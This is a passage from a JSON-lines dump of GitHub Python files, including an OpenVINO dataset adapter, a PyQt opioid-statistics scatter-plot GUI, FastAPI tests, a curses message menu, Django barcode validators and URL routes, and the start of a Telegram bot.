dfs(info,graph,parent[i],sheep,wolf,visited)\n    return result\n\n#print(solution([0,0,1,1,1,0,1,0,1,0,1,1],[[0,1],[1,2],[1,4],[0,8],[8,7],[9,10],[9,11],[4,3],[6,5],[4,6],[8,9]]))\nprint(solution([0,1,0,1,1,0,1,0,0,1,0],[[0,1],[0,2],[1,3],[1,4],[2,5],[2,6],[3,7],[4,8],[6,9],[9,10]]))\n#print(solution([0,1,1,0,0,0,1,1,0],[[0,1],[0,5],[1,3],[5,7],[5,2],[2,4],[2,6],[4,8]]))\n#print(solution([0,1,0,1,1,1,1,0,1,1,0],[[0,4],[0,2],[4,7],[7,1],[4,1],[2,5],[2,8],[5,6],[5,9],[6,10]]))","repo_name":"dbswl4951/baekjoon_algorithm","sub_path":"kakao/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27163164309","text":"import re\nfrom pathlib import Path\n\nfrom app.error.inconsistent_upload_error import InconsistentDatasetError\nfrom app.main.jobs.utils.yml_templates.registry import register_dataset_adapter\nfrom app.main.jobs.utils.yml_abstractions.annotation import Annotation\nfrom app.main.models.enumerates import DatasetTypesEnum\nfrom config.constants import VOC_ROOT_FOLDER\n\n\nclass BaseDatasetAdapter:\n    \"\"\"\n    Provides methods for dealing with a dataset.\n\n    Adding a new dataset type:\n    1. Create a `BaseDatasetAdapter` subclass\n    2. 
Find the corresponding annotation converter (subclass of `BaseFormatConverter`) in\n http://github.com/opencv/open_model_zoo/tree/master/tools/accuracy_checker/accuracy_checker/annotation_converters\n 3. Set the `converter` attribute of the subclass to the name of the corresponding annotation converter\n (The name is contained in the `__provider__` attribute of the annotation converter class).\n 4. Implement `recognize()`\n 5. Implement `get_data_source()`\n 6. Implement `get_specific_params()`\n \"\"\"\n\n converter = None\n\n def __init__(self, dataset_path: str):\n self.dataset_path = Path(dataset_path)\n if not self.dataset_path.exists():\n raise FileNotFoundError(self.dataset_path)\n if not self.dataset_path.is_dir():\n raise NotADirectoryError(self.dataset_path)\n\n self.params = self.get_params()\n\n @staticmethod\n def recognize(dataset_path: str) -> bool:\n \"\"\"Check if the `dataset_path` contains a dataset of type related to this subclass.\"\"\"\n raise NotImplementedError\n\n def get_data_source(self) -> Path:\n \"\"\"Return absolute path to the directory containing images.\"\"\"\n raise NotImplementedError\n\n def get_specific_params(self) -> dict:\n \"\"\"\n Return only the annotation conversion params specific for this type of dataset.\n\n Find the parameters in the `parameters()` method of the corresponding annotation converter class.\n \"\"\"\n raise NotImplementedError\n\n def get_params(self) -> dict:\n \"\"\"Return all annotation conversion params.\"\"\"\n params = self.get_specific_params()\n params.update({\n 'converter': self.converter,\n 'images_dir': self.get_data_source(), # Used by Accuracy Checker for content checking.\n })\n return params\n\n def abs_path(self, relative_path: str) -> Path:\n absolute_path = self.dataset_path / relative_path\n if not absolute_path.exists():\n raise InconsistentDatasetError('Cannot find {}'.format(relative_path))\n return absolute_path\n\n def to_annotation(self) -> dict:\n serializable_params = {key: str(value) for key, value in self.params.items()}\n return {\n 'data_source': str(self.get_data_source()),\n 'annotation': Annotation(**serializable_params),\n }\n\n\n@register_dataset_adapter(DatasetTypesEnum.imagenet)\nclass ImagenetDatasetAdapter(BaseDatasetAdapter):\n converter = 'imagenet'\n\n @staticmethod\n def recognize(dataset_path: str) -> bool:\n content = list(Path(dataset_path).iterdir())\n no_subdirs = all(path.is_file() for path in content)\n has_txt = any(path.suffix.lower() == '.txt' for path in content)\n return no_subdirs and has_txt\n\n def get_data_source(self) -> Path:\n return self.dataset_path\n\n def get_specific_params(self) -> dict:\n return {\n 'annotation_file': self.get_annotation_file_path(),\n }\n\n def get_annotation_file_path(self) -> Path:\n annotation_file_paths = [path for path in self.dataset_path.iterdir() if self.is_imagenet_annotation_file(path)]\n if not annotation_file_paths:\n raise InconsistentDatasetError('Cannot find annotation file.')\n if len(annotation_file_paths) > 1:\n raise InconsistentDatasetError(\n 'Too many annotation files: {}.'.format([path.name for path in annotation_file_paths]))\n return annotation_file_paths[0]\n\n @staticmethod\n def is_imagenet_annotation_file(path: Path):\n if not path.is_file() or path.suffix.lower() != '.txt':\n return False\n with open(str(path)) as file:\n return all(re.match(r'^\\S+[ \\t]+[0-9]+$', line.rstrip(' \\t\\r\\n')) for line in file if line.strip('\\r\\n'))\n\n\n@register_dataset_adapter(DatasetTypesEnum.voc_object_detection)\nclass 
VOCDetectionDatasetAdapter(BaseDatasetAdapter):\n converter = 'voc_detection'\n\n @staticmethod\n def recognize(dataset_path: str) -> bool:\n return (Path(dataset_path) / VOC_ROOT_FOLDER).is_dir()\n\n def get_data_source(self) -> Path:\n return self.abs_path('VOCdevkit/VOC{}/JPEGImages'.format(self.voc_version))\n\n def get_specific_params(self) -> dict:\n return {\n 'imageset_file': self.get_imageset_file(),\n 'annotations_dir': self.abs_path('VOCdevkit/VOC{}/Annotations'.format(self.voc_version)),\n }\n\n def __init__(self, *args, **kwargs):\n self._voc_version = None\n super().__init__(*args, **kwargs)\n\n @property\n def voc_version(self):\n if not self._voc_version:\n vocdevkit_dir = self.abs_path('VOCdevkit')\n voc_version_dirnames = [d.name for d in vocdevkit_dir.iterdir() if d.name.startswith('VOC') and d.is_dir()]\n if not voc_version_dirnames:\n raise InconsistentDatasetError(\n 'Cannot find \"VOCdevkit/VOC\" directory.')\n if len(voc_version_dirnames) > 1:\n raise InconsistentDatasetError(\n 'Too many \"VOCdevkit/VOC\" directories: {}.'.format(voc_version_dirnames))\n self._voc_version = voc_version_dirnames[0].split('VOC')[1]\n return self._voc_version\n\n def get_imageset_file(self):\n path_to_dir = self.abs_path('VOCdevkit/VOC{}/ImageSets/Main'.format(self.voc_version))\n for filename in ('test.txt', 'val.txt', 'train.txt'):\n path = path_to_dir / filename\n if path.is_file():\n return path\n raise InconsistentDatasetError('Cannot find an imageset file for this dataset.')\n","repo_name":"nathanbangwa243/VLinder-AI","sub_path":"intel/openvino_2019.3.376/deployment_tools/tools/workbench/app/main/jobs/utils/yml_templates/dataset_adapters.py","file_name":"dataset_adapters.py","file_ext":"py","file_size_in_byte":6202,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"4449234706","text":"from pandas import DataFrame\nimport plotly.express as px\nimport sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtCore, QtWidgets, QtWebEngineWidgets\nimport numpy as np\nimport json\nimport pandas as pd\n\nlaborstats_data = json.load(open(\"HTMLLaborStatistics.json\", 'r'))\nnotinlaborforce = laborstats_data['Not in Labor Force Percent']\nemployed = laborstats_data['Employed Percent']\nunemployment = laborstats_data['Unemployment Percent']\n\neduc_data = json.load(open(\"EducationAttainment.json\", 'r'))\nlessthan9th = educ_data['Less Than 9th Percent']\nhighschool = educ_data['High School Graduate Percent']\nbachelor = educ_data['Bachelor Degree Percent']\n\nwith open(\"economic_data.json\") as econ:\n econ_dataframe = pd.read_json(econ)\n econ_dataframe = econ_dataframe.transpose()\n econ_dataframe.sort_index(inplace = True, axis = 0)\n #print(econ_dataframe.loc[\"Mcintosh\", :])\n POP = list(econ_dataframe[\" Population (Persons) (Number Of Persons)\"])\n PCNE = list(econ_dataframe[\" Per Capita Net Earnings (Dollars)\"])\n NEBPR = list(econ_dataframe[\" Net Earnings By Place Of Residence (Thousands Of Dollars)\"])\n PCPI = list(econ_dataframe[\" Per Capita Personal Income (Dollars)\"])\n PCPCTR = list(econ_dataframe[\" Per Capita Personal Current Transfer Receipts (Dollars)\"])\n PCIMB = list(econ_dataframe[\" Per Capita Income Maintenance Benefits (Dollars)\"])\n PCUIC = list(econ_dataframe[\" Per Capita Unemployment Insurance Compensation (Dollars)\"])\n PCRO = list(econ_dataframe[\" Per Capita Retirement And Other (Dollars)\"])\n\nopioiddata = json.load(open(\"opioid_dat.json\", 'r'))\nopioid = {}\nfor key in opioiddata:\n 
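# keep only the total prescription claim count for each county\n    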
opioid[key] = opioiddata[key]['total_claims']\n\npopdata = json.load(open(\"economic_data.json\", 'r'))\npop = {}\ncounties = []\n\nfor key in popdata:\n pop[key] = popdata[key][' Population (Persons) (Number Of Persons)']\n counties.append(key)\ncounties.sort()\nopioidrate = []\nfor key in counties:\n if opioid[key] and pop[key]:\n opioidrate.append(opioid[key]/pop[key])\n else:\n opioidrate.append(0)\n\nclass MainWindow(QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Scatter Graph Generator\")\n\n self.label1 = QLabel(\"X-Axis:\")\n self.label1.setAlignment(QtCore.Qt.AlignCenter)\n self.label2 = QLabel(\"Y-Axis:\")\n self.label2.setAlignment(QtCore.Qt.AlignCenter)\n\n self.cb = QComboBox()\n self.cb.addItems([\"\",\"Unemployment Rate\", \"Not in Labor Force Rate\", \"Employed Rate\", \"Percentage with Less than 9th Grade Education\", \"Percentage that Graduated Highschool\"])\n self.cb.addItems([\"Percentage with Bachelor's Degree\", \"Per Capita Net Earnings (Dollars)\", \"Net Earnings By Place Of Residence (Thousands Of Dollars)\", \"Per Capita Personal Income (Dollars)\"])\n self.cb.addItems([\"Per Capita Personal Current Transfer Receipts (Dollars)\", \"Per Capita Income Maintenance Benefits (Dollars)\", \"Per Capita Unemployment Insurance Compensation (Dollars)\", \"Per Capita Retirement And Other (Dollars)\"])\n self.cb.activated[str].connect(self.generate)\n\n self.cb1 = QComboBox()\n self.cb1.addItems([\"\", \"Opioid Prescription Rate \"])\n self.cb1.activated[str].connect(self.generate)\n\n self.button = QtWidgets.QPushButton('Generate Graph!', self)\n self.browser = QtWebEngineWidgets.QWebEngineView(self)\n self.infobutton = QPushButton(\"Instructions\")\n\n\n layout = QVBoxLayout()\n\n vlayout = QVBoxLayout()\n vlayout.addWidget(self.button, alignment=QtCore.Qt.AlignHCenter)\n vlayout.addWidget(self.browser)\n self.button.clicked.connect(self.creategraph)\n self.resize(1000,800)\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.label1)\n hbox.addWidget(self.cb)\n\n hbox2 = QHBoxLayout()\n hbox2.addWidget(self.label2)\n hbox2.addWidget(self.cb1)\n\n hbox4 = QHBoxLayout()\n hbox4.addWidget(self.infobutton)\n self.infobutton.clicked.connect(self.info)\n\n layout.addLayout(hbox4)\n layout.addLayout(hbox)\n layout.addLayout(hbox2)\n layout.addLayout(vlayout)\n\n self.setLayout(layout)\n\n def generate(self):\n if self.cb.currentText() and self.cb1.currentText():\n self.button.setEnabled(True)\n self.button.clicked.connect(self.creategraph)\n else:\n pass\n\n def creategraph(self):\n if self.cb.currentText() == \"\" or self.cb1.currentText()==\"\":\n self.button.setEnabled(False)\n pass\n elif self.cb.currentText() == \"Employed Rate\":\n df = pd.DataFrame({\"opioidrate\":opioidrate, \"employed\":employed, 'counties':counties},index=counties)\n df = df[df[\"opioidrate\"] != 0]\n\n a = np.array(df['employed'])\n b = np.array(df['opioidrate'])\n c = np.array(df['counties'])\n\n df = px.data.tips()\n fig = px.scatter(x = a, y = b, trendline=\"ols\", title=\"Employed Percentage v.s. 
# of Prescriptions Per Person\", \\\n                labels={\"x\": \"Employed Percentage\",\"y\": \"# of Prescriptions Per Person\"}, hover_name=c, opacity=0.7)\n            fig.data[1].update(line_color='red')\n            self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n        else:\n            # Every remaining x-axis choice shares the same plotting logic, so map\n            # the combo-box label to its data series and axis caption once instead\n            # of repeating the scatter block (and the unused px.data.tips() call)\n            # for each option.\n            options = {\n                \"Unemployment Rate\": (unemployment, \"Unemployment Rate (%)\"),\n                \"Not in Labor Force Rate\": (notinlaborforce, \"Not in Labor Force Rate (%)\"),\n                \"Percentage with Less than 9th Grade Education\": (lessthan9th, \"Percentage with Less than 9th Grade Education (%)\"),\n                \"Percentage that Graduated Highschool\": (highschool, \"Percentage that Graduated Highschool (%)\"),\n                \"Percentage with Bachelor's Degree\": (bachelor, \"Percentage with Bachelor's Degree (%)\"),\n                \"Per Capita Net Earnings (Dollars)\": (PCNE, \"Per Capita Net Earnings (Dollars)\"),\n                \"Net Earnings By Place Of Residence (Thousands Of Dollars)\": (NEBPR, \"Net Earnings By Place Of Residence (Thousands Of Dollars)\"),\n                \"Per Capita Personal Income (Dollars)\": (PCPI, \"Per Capita Personal Income (Dollars)\"),\n                \"Per Capita Personal Current Transfer Receipts (Dollars)\": (PCPCTR, \"Per Capita Personal Current Transfer Receipts (Dollars)\"),\n                \"Per Capita Income Maintenance Benefits (Dollars)\": (PCIMB, \"Per Capita Income Maintenance Benefits (Dollars)\"),\n                \"Per Capita Unemployment Insurance Compensation (Dollars)\": (PCUIC, \"Per Capita Unemployment Insurance Compensation (Dollars)\"),\n                \"Per Capita Retirement And Other (Dollars)\": (PCRO, \"Per Capita Retirement And Other (Dollars)\"),\n            }\n            choice = self.cb.currentText()\n            if choice in options:\n                values, xlabel = options[choice]\n                # drop counties with no prescription data before fitting the trendline\n                df = pd.DataFrame({\"opioidrate\": opioidrate, \"x\": values, \"counties\": counties}, index=counties)\n                df = df[df[\"opioidrate\"] != 0]\n                fig = px.scatter(x=np.array(df['x']), y=np.array(df['opioidrate']), trendline=\"ols\",\n                    title=xlabel + \" v.s. # of Prescriptions Per Person\",\n                    labels={\"x\": xlabel, \"y\": \"# of Prescriptions Per Person\"},\n                    hover_name=np.array(df['counties']), opacity=0.7)\n                fig.data[1].update(line_color='red')\n                self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n\n\n    def info(self):\n        self.messbox = QMessageBox()\n        self.messbox.setIcon(QMessageBox.Information)\n        self.messbox.setText(\"Instructions\")\n        self.messbox.setInformativeText(\"After selecting the axis values, press 'Generate Graph!' to create the desired scatter graph. 
Please wait as it takes a few seconds for the graph to load :)\")\n self.messbox.exec()\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n main = MainWindow()\n main.show()\n sys.exit(app.exec_())\n\n\"\"\"\npython GUI.py\n\"\"\"\n","repo_name":"pneo19/ga-opioid-epidemic-project","sub_path":"PhaseII.py","file_name":"PhaseII.py","file_ext":"py","file_size_in_byte":15638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36425240644","text":"from BlockchainClass import Blockchain\n\nnew_transactions = [{'amount': '30', 'sender':'alice', 'receiver':'bob'},\n \t{'amount': '55', 'sender':'bob', 'receiver':'alice'}]\n\nmy_blockchain = Blockchain()\n\nmy_blockchain.add_block(new_transactions)\nmy_blockchain.print_blocks()\nmy_blockchain.chain[1].transactions = \"fake_transactions\"\nmy_blockchain.print_blocks()\nmy_blockchain.validate_chain()\n\nnew_transactions = [{'amount': '30', 'sender': 'alice', 'receiver': 'bob'},\n {'amount': '55', 'sender': 'bob', 'receiver': 'alice'}]\n\n# import sha256\nfrom hashlib import sha256\n\n# sets the amount of leading zeros that must be found in the hash produced by the nonce\ndifficulty = 2\nnonce = 0\n# creating the proof\n\"\"\"string = str(nonce) + str(new_transactions)\nproof = sha256(string.encode()).hexdigest()\n# printing proof\nprint(proof)\"\"\"\n\n\"\"\"# finding a proof that has 2 leading zeros\ntest = False\nwhile not test:\n string = str(nonce) + str(new_transactions)\n proof = sha256(string.encode()).hexdigest()\n needed_zeros = True\n for i in range(difficulty):\n if proof[i] != \"0\":\n #print(\"Index \" + str(i) + \" ist nicht 0!\")\n needed_zeros = False\n break\n if needed_zeros == True:\n test = True\n print(nonce)\n print(proof)\n nonce = nonce + 1\"\"\"\n","repo_name":"jonasjuenemann/PyProjects","sub_path":"BlockChain/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11884725654","text":"from httpx import AsyncClient\n\nfrom backend_amirainvest_com.api.app import app\n\nfrom ..config import AUTH_HEADERS\n\n\nasync def test_not_authenticated_get_user_subscriptions():\n async with AsyncClient(app=app, base_url=\"http://test\") as async_client:\n response = await async_client.get(\"/user_subscriptions/subscriber\")\n assert response.status_code == 403\n assert response.json() == {\"detail\": \"Not authenticated\"}\n\n\nasync def test_get_subscriptions_for_subscriber(factory, mock_auth):\n subscriber = await factory.gen(\"users\")\n subscriber_id = subscriber[\"users\"].id\n creator = await factory.gen(\"users\")\n await factory.gen(\n \"user_subscriptions\",\n {\"user_subscriptions\": {\"creator_id\": creator[\"users\"].id, \"subscriber_id\": subscriber_id}},\n )\n await mock_auth(subscriber_id)\n async with AsyncClient(app=app, base_url=\"http://test\") as async_client:\n response = await async_client.get(\"/user_subscriptions/subscriber\", headers=AUTH_HEADERS)\n assert response.status_code == 200\n assert str(creator[\"users\"].id) in [x[\"creator_id\"] for x in response.json()]\n\n\nasync def test_get_subscriptions_for_creator(factory, mock_auth):\n subscriber = await factory.gen(\"users\")\n creator = await factory.gen(\"users\")\n creator_id = creator[\"users\"].id\n await factory.gen(\n \"user_subscriptions\",\n {\"user_subscriptions\": {\"creator_id\": creator_id, \"subscriber_id\": subscriber[\"users\"].id}},\n )\n await 
mock_auth(creator_id)\n async with AsyncClient(app=app, base_url=\"http://test\") as async_client:\n response = await async_client.get(\"/user_subscriptions/creator\", headers=AUTH_HEADERS)\n assert response.status_code == 200\n assert str(subscriber[\"users\"].id) in [x[\"subscriber_id\"] for x in response.json()]\n\n\nasync def test_create_subscription(factory, mock_auth):\n subscriber = await factory.gen(\"users\")\n creator = await factory.gen(\"users\")\n subscriber_id = subscriber[\"users\"].id\n await mock_auth(subscriber_id)\n async with AsyncClient(app=app, base_url=\"http://test\") as async_client:\n response = await async_client.post(\n \"/user_subscriptions/subscribe\",\n headers=AUTH_HEADERS,\n params={\n \"creator_id\": str(creator[\"users\"].id),\n },\n )\n assert response.status_code == 200\n","repo_name":"amirainvest/amirainvest_com","sub_path":"src/backend_amirainvest_com/test/unit/backend_amirainvest_com/api/routers/test_user_subscriptions.py","file_name":"test_user_subscriptions.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"8461719412","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom time import sleep\nimport curses, os\nimport messageChecker\n\nscreen = curses.initscr()\ncurses.noecho() \ncurses.cbreak() \ncurses.start_color() \nscreen.keypad(1)\n\n\ncurses.init_pair(1,curses.COLOR_BLACK, curses.COLOR_WHITE) \nh = curses.color_pair(1) \nn = curses.A_NORMAL \n\nMENU = \"menu\"\nCOMMAND = \"command\"\nEXITMENU = \"exitmenu\"\nMID = \"m\" #personal convers /!\\ not only\n_ID = \"i\" #group\nINFO = 'info' \nEXT = 'extend'\n\n\nmenu_data = {\n 'title': \"Message Checker\", 'type': MENU, EXT : '', 'subtitle': \"Please select an option...\",\n 'options':[\n { 'title': \"Unread messages\", 'type': MENU, EXT : '', 'subtitle': \"Please select an option...\", #\n 'options': [\n { 'title': \"author: \", 'type': INFO, EXT : '', 'ID': 'uid', 'nbUnread' : 'x' },\n ]\n },\n { 'title': \"Sent messages\", 'type': MENU, EXT : '', 'subtitle': \"Please select an option...\", #\n 'options': [\n { 'title': \"author: \", 'type': INFO, EXT : '', 'ID': 'uid' },\n ]\n },\n { 'title': \"Send new message\", 'type': COMMAND, EXT : '', 'command': 'NewMessage' }, #\n ]\n}\n\nmessage_f = {\n 'title' : \": \", 'type' : INFO, EXT : '', 'timestamp' : 'timestamp', 'body' : 'body', 'subtitle': \"Please select an option...\", \n 'options' : [\n { 'title' : 'Mark as read', 'type' : COMMAND, EXT : '', 'command' : 'MarkAsRead'},\n { 'title' : 'Reply', 'type' : COMMAND, EXT : '', 'command' : 'Reply'},\n { 'title' : 'Decrypt', 'type' : COMMAND, EXT : '', 'command' : 'Decrypt', 'body' : 'body', 'timestamp' : 'timestamp'},\n { 'title' : 'Reply with encription', 'type' : COMMAND, EXT : '', 'command' : 'cryptReply'},\n ]\n}\n\ndef fillMenu(menuFormat=menu_data):\n \n allMess = messageChecker.getUnread()\n for key in allMess:\n if int(key['nbUnread']) > 0:\n menuFormat['options'][0]['options'].append(key)\n\n#Menu\n#/!\\ not dynamic yet\ndef runmenu(menu, parent):\n\n if parent is None:\n lastoption = \"Exit\"\n else:\n lastoption = \"Return to %s menu\" % parent['title']\n\n optioncount = len(menu['options']) \n pos=0 \n oldpos=None \n x = None \n \n while x !=ord('\\n'):\n if pos != oldpos:\n oldpos = pos\n screen.border(0)\n if menu[EXT] == 'body':\n screen.addstr(2,2, menu['body'], curses.A_STANDOUT)\n else:\n screen.addstr(2,2, menu['title'], curses.A_STANDOUT) \n screen.addstr(4,2, 
menu['subtitle'], curses.A_BOLD) \n for index in range(optioncount):\n textstyle = n\n if pos==index:\n textstyle = h\n screen.addstr(5+index,4, \"%d - %s\" % (index+1, menu['options'][index]['title']), textstyle)\n textstyle = n\n if pos==optioncount:\n textstyle = h\n screen.addstr(5+optioncount,4, \"%d - %s\" % (optioncount+1, lastoption), textstyle)\n screen.refresh()\n \n x = screen.getch() \n \n if x >= ord('1') and x <= ord(str(optioncount+1)[0]):\n pos = x - ord('0') - 1 \n elif x == 258: \n if pos < optioncount:\n pos += 1\n else: pos = 0\n elif x == 259: \n if pos > 0:\n pos += -1\n else: pos = optioncount\n\n return pos\n\n\n#Selected checker\ndef processmenu(menu, parent=None):\n\n optioncount = len(menu['options'])\n exitmenu = False\n while not exitmenu:\n getin = runmenu(menu, parent)\n if getin == optioncount:\n exitmenu = True\n elif menu['options'][getin]['type'] == MENU:\n screen.clear()\n if menu['options'][getin][EXT] == 'messages':\n menu['options'][getin]['options'] = messageChecker.organizeMess(menu['options'][getin]['ID'])\n processmenu(menu['options'][getin], menu)\n screen.clear()\n elif menu['options'][getin]['type'] == EXITMENU:\n exitmenu = True\n elif menu['options'][getin]['type'] == MID:\n x = None\n screen.clear()\n messages = messageChecker.readMess(menu['options'][getin]['ID'])\n fi = ''\n for mess in messages:\n mess = mess.encode('ascii', 'ignore').decode('ascii')\n fi += mess + '\\n\\n'\n screen.addstr(2,2, fi, curses.A_STANDOUT) \n while x !=ord('\\n'):\n x = screen.getch()\n screen.clear()\n\n# Main program\nfillMenu(menu_data)\nprocessmenu(menu_data)\ncurses.endwin()\nos.system('clear')\n","repo_name":"Es-so/Util_tools","sub_path":"test_AUTO_FB_LOGGER_and_SEND_MESS/messMenu.py","file_name":"messMenu.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40325926112","text":"from django.conf import settings\nimport requests\nimport jwt\nfrom barcode_pattern_app.models import (BarcodePatternMaster,BarcodeShopMapping)\nfrom barcode_pattern_app.serializers import (\nBarcodePatternMasterSerializer,BarcodeShopMappingSerializer)\n\ndef check_code_type_is_present(code_type,check_flag,id):\n try:\n if type(code_type) == str and code_type.isnumeric() == False:\n return False,\"Code type must be an number\"\n if check_flag == 'insert':\n queryParams = BarcodePatternMaster.objects.filter(code_type=int(code_type),is_active=True,is_deleted=False).first()\n if check_flag == 'update':\n queryParams = BarcodePatternMaster.objects.filter(code_type=int(code_type),is_active=True,is_deleted=False).exclude(id=id).first()\n if queryParams:\n barcodePatternMasterSerializer = BarcodePatternMasterSerializer(queryParams)\n if len(barcodePatternMasterSerializer.data) != 0:\n return False, \"Code type is already present\"\n else:\n return True,\"\"\n except Exception as e:\n return False,str(e)\n\ndef check_pattern_sample_is_present(pattern_sample,check_flag,id):\n try:\n if check_flag == 'insert':\n queryParams = BarcodePatternMaster.objects.filter(pattern_sample=pattern_sample,is_active=True,is_deleted=False).first()\n if check_flag == 'update':\n queryParams = BarcodePatternMaster.objects.filter(pattern_sample=pattern_sample,is_active=True,is_deleted=False).exclude(id=id).first()\n if queryParams:\n barcodePatternMasterSerializer = BarcodePatternMasterSerializer(queryParams)\n if len(barcodePatternMasterSerializer.data) != 0:\n return False, \"Pattern sample is already 
present\"\n else:\n return True,\"\"\n except Exception as e:\n return False,str(e)\n\ndef check_code_description(code_description):\n try:\n if len(code_description)>500:\n return False, \"Code description should be 500 character\"\n return True,\"\"\n except Exception as e:\n return False,str(e)\n\ndef check_pn_bt_bs(request_string,request_key):\n try:\n if len(request_string)>250:\n return False, request_key+\" should be 250 character\"\n return True,\"\"\n except Exception as e:\n return False,str(e)\n\ndef check_barcode_length(barcode_length,barcode_sample):\n try:\n if type(barcode_length) == str and barcode_length.isnumeric() == False:\n return False, \"barcode length should be numeric\"\n if int(barcode_length) != len(barcode_sample):\n return False, \"barcode length and barcode sample length are not same\"\n return True,\"\"\n except Exception as e:\n return False,str(e)\n\n\ndef check_extra_information(request_data):\n if request_data['is_part_number']:\n status,message = check_start_end_numeric(request_data['part_number_start_at'],request_data['part_number_end_at'],\"Part Number\")\n if status==False:\n return status,message\n status, substring = genrate_substring(request_data['part_number_start_at'],\n request_data['part_number_end_at'], request_data['pattern_sample'])\n if status==False:\n status, message\n if substring != request_data['part_number']:\n return False,\"Part no is not matching\"\n if request_data['is_vendor_code']==True:\n status, message = check_start_end_numeric(request_data['vendor_code_start_at'],\n request_data['vendor_code_end_at'],\"Vendor Code\")\n if status == False:\n return status, message\n status, substring = genrate_substring(request_data['vendor_code_start_at'],\n request_data['vendor_code_end_at'], request_data['pattern_sample'])\n if status == False:\n status, message\n if substring != request_data['vendor_code']:\n return False, \"Vendor code is not matching\"\n if request_data['is_batch_code']:\n status, message = check_start_end_numeric(request_data['batch_code_start_at'],\n request_data['batch_code_end_at'],\"Batch Code\")\n if status == False:\n return status, message\n status, substring = genrate_substring(request_data['batch_code_start_at'],\n request_data['batch_code_end_at'], request_data['pattern_sample'])\n if status == False:\n status, message\n if substring != request_data['batch_code']:\n return False, \"Vendor code is not matching\"\n return True,\"\"\n\ndef check_start_end_numeric(start_at,end_at,request_key):\n try:\n if type(start_at) == str and start_at.isnumeric() == False:\n return False, request_key+\" start at should be numeric\"\n if type(end_at) == str and end_at.isnumeric() == False:\n return False, request_key+\" end at should be numeric\"\n if int(start_at) >= int(end_at):\n return False, request_key+\" start at should be less than end at\"\n return True,\"\"\n except Exception as e:\n return False,str(e)\n\ndef genrate_substring(start_at,end_at,original_string):\n try:\n #original_string = \" \"+original_string\n start_at = int(start_at)-1\n end_at = int(end_at)\n return True,original_string[start_at:end_at]\n except Exception as e:\n return False, str(e)\ndef get_user_name_from_token(request):\n user_name = request.META['user_name']\n if not user_name:\n return False\n return 
True,user_name\n\n","repo_name":"surajpttl/python-ci-cd","sub_path":"barcode_pattern_app/validations.py","file_name":"validations.py","file_ext":"py","file_size_in_byte":5705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31553386950","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n # Examples:\n #courier\n url(r'^courier','front.views.courier_request', name='courier_request'),\n url(r'^cou','front.views.courier_res',name='courier_res'),\n #\n url(r'^user','front.views.user_login',name='user_login'),\n url(r'^response','front.views.user_response', name='user_response'),\n url(r'^edata','front.views.hello'),\n url(r'^adminu','front.views.adminuser'),\n \n url(r'^about','front.views.abt'),\n url(r'^depots','front.views.depot'),\n url(r'^fares','front.views.fare'),\n\n url(r'^bushire$','front.views.ebushire'),\n url(r'^bushire-submit','front.views.ebushiresubmit'),\n #homepage\n url(r'^home','front.views.home'),\n url(r'^bhome','front.views.homepbus'),\n url(r'^chome','front.views.homepcourier'),\n #\n url(r'^search','front.views.search'),\n url(r'^xyz', 'front.views.adhome'),\n url(r'^details', 'front.views.adminuser'),\n url(r'^cdetails', 'front.views.hello'),\n url(r'^admin', 'front.views.login'), #admin-login\n url(r'^wqr', 'front.views.my'),\n url(r'^book', 'front.views.seat'),\n url(r'^dbusreq', 'front.views.bush'),\n url(r'^admin/', include(admin.site.urls)),\n]\n","repo_name":"AshnaAN/project","sub_path":"ksrtc/ksrtc/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12652833556","text":"from selenium.webdriver.common.by import By\nfrom pages.base_page import BasePage\n\n\nclass FiltersPage(BasePage):\n SELECT_DISCOUNT = (By.XPATH, '//ul[@id=\"DiscountLevel\"]/li[2]/a')\n SEARCH_RESULTS = (By.XPATH, '//div[@class=\"hidden-sm element-count text-nowrap\"]')\n\n def select_discount(self):\n self.wait_and_click_element_by_selector(*self.SELECT_DISCOUNT)\n\n def filter_search_results(self):\n search_results = self.chrome.find_element(*self.SEARCH_RESULTS)\n number_of_products_text = search_results.text.strip().split()[0]\n number_of_products = float(number_of_products_text.replace('.', ''))\n assert number_of_products > 1000, \\\n \"Error, the number of search results does not meet expectations.\"\n","repo_name":"gHINDAOANUiUSTIN/Proiect-final-BDD-Elefant","sub_path":"pages/filters_page.py","file_name":"filters_page.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71656690769","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nUnistudiumListener - Telegram Bot\nAuthor: CoffeeStraw\n\"\"\"\nimport os\nimport re\nimport time\nimport requests\nimport threading\n\nimport logging\nimport colorama\nfrom colorama import Fore, Style\n\nfrom telegram import (ReplyKeyboardMarkup, ReplyKeyboardRemove,\n InlineKeyboardButton, InlineKeyboardMarkup, ChatAction, ParseMode)\nfrom telegram.ext import (Updater, CommandHandler, MessageHandler, Filters, RegexHandler,\n ConversationHandler, CallbackQueryHandler, PicklePersistence)\n\nimport unistudium_framework as uni\nfrom settings import TOKEN, UPD_TIME, 